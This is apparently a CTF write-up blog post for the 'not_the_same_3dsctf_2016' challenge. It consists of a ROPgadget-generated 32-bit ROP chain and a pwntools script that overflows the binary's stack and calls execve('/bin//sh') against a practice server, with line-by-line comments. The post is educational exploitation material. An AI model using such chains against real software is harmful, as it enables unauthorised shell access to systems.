ROPgadget-not_the_same_3dsctf_2016

Posted by Mr.Be1ieVe on Tuesday, January 14, 2020

image-20200113223607640

image-20200113222600352

ROPgadget --binary not_the_same_3dsctf_2016 --ropchain

自动生成

# Auto-generated by `ROPgadget --ropchain` (the command shown above): an i386
# ROP chain that (1) stores the 8-byte string "/bin//sh" plus a zero dword in
# .data using a write-what-where gadget, (2) loads ebx/ecx/edx with pointers
# into that buffer, (3) sets eax = 11 and (4) executes `int 0x80`. On 32-bit
# Linux, syscall 11 is execve(ebx=path, ecx=argv, edx=envp). Every gadget is an
# absolute address, so the chain presumes the binary is mapped at a fixed base
# (no PIE) — confirm against the ELF headers.
# NOTE(review): this is Python 2 code, where pack() returns str. Under Python 3
# pack() returns bytes and `'' + bytes` raises TypeError, so the '' / '/bin' /
# '//sh' literals would have to be bytes literals for the chain to even build.
from struct import pack
p = ''
# --- store "/bin" at .data: edx = destination, eax = the 4 raw string bytes ---
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x08048b0b) # pop eax ; ret
p += '/bin'                  # popped into eax as a 4-byte value, not packed
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
# --- store "//sh" at .data + 4; the doubled slash pads the path to exactly
#     8 bytes so two dword writes suffice ("//" resolves like "/") ---
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb064) # @ .data + 4
p += pack('<I', 0x08048b0b) # pop eax ; ret
p += '//sh'                  # second half of the path, again raw bytes into eax
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
# --- store a zero dword at .data + 8: NUL terminator for the path and, below,
#     the NULL-terminated (empty) argv/envp arrays ---
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x08049423) # xor eax, eax ; ret
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
# --- execve arguments: ebx = .data ("/bin//sh"), ecx = .data + 8 (zero dword),
#     edx = .data + 8 (zero dword) ---
p += pack('<I', 0x080481ad) # pop ebx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x0806fcf1) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8  -> ecx
p += pack('<I', 0x080eb060) # padding without overwrite ebx (second pop reloads ebx with the same .data pointer)
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8  -> edx
# --- eax = 0, then eleven increments -> 0xb, the execve syscall number ---
p += pack('<I', 0x08049423) # xor eax, eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0806d8a5) # int 0x80  (system call with eax = 11 -> execve)

加上自己算的偏移

# pwntools harness around the generated chain above: prepend the stack filler
# the author computed (0x2D bytes, per the heading) so the chain presumably
# lands on the saved return address — that offset is asserted by the post, not
# derived on this page.
# NOTE(review): same Python 2 assumption as the generated chain — on Python 3
# cyclic() and pack() return bytes, so `p += ''`, '/bin' and '//sh' would raise
# TypeError.
from pwn import *
from struct import pack                       # rebinds pack to struct.pack; pwn's star-import also exports a pack with a different signature, and the '<I' calls below need the struct one
elf = ELF("./not_the_same_3dsctf_2016")       # loaded but never used below — every address is hard-coded
#sh = process("./not_the_same_3dsctf_2016")   # local alternative to the remote instance
sh = remote("node3.buuoj.cn",26066)           # CTF practice instance named in the post
context.log_level = "debug"                   # hex-dump every send/recv
context.arch = "i386"                         # 32-bit x86, matching the int 0x80 chain
p = cyclic(0x2D)                              # de Bruijn filler up to the overwritten return address (offset from the post)
p += ''                                       # no-op leftover from the ROPgadget template
# --- store "/bin" at .data ---
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x08048b0b) # pop eax ; ret
p += '/bin'                  # raw 4 bytes into eax
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
# --- store "//sh" at .data + 4 (path padded to 8 bytes with a doubled slash) ---
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb064) # @ .data + 4
p += pack('<I', 0x08048b0b) # pop eax ; ret
p += '//sh'                  # raw 4 bytes into eax
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
# --- store a zero dword at .data + 8: NUL terminator and empty argv/envp ---
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x08049423) # xor eax, eax ; ret
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
# --- execve(ebx="/bin//sh", ecx=.data+8, edx=.data+8) register setup ---
p += pack('<I', 0x080481ad) # pop ebx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x0806fcf1) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8  -> ecx
p += pack('<I', 0x080eb060) # padding without overwrite ebx (second pop reloads ebx with the same .data pointer)
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8  -> edx
# --- eax = 0 + 11 increments = 0xb (execve on 32-bit Linux) ---
p += pack('<I', 0x08049423) # xor eax, eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0806d8a5) # int 0x80  (system call with eax = 11 -> execve)
sh.sendline(p)      # payload followed by a newline
sh.interactive()    # hand the terminal over to the remote process (expected: a shell)
